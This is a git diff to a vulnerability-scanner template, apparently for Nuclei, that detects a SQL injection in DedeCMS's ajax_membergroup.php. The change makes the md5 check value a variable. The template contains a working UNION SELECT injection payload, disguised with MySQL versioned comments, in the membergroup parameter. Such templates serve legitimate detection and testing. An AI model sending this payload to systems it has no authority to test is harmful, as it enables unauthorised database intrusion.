diff --git a/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml b/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
index 6ab43810d6..0b4794d6ed 100644
--- a/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
+++ b/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
@@ -9,17 +9,20 @@ info:
     - http://www.dedeyuan.com/xueyuan/wenti/1244.html
   tags: sqli,dedecms
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
+      - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
 
     matchers-condition: and
     matchers:
 
       - type: word
         words:
-          - "52c69e3a57331081823331c4e69d3f2e"
+          - '{{md5({{num}})}}'
         part: body
 
       - type: status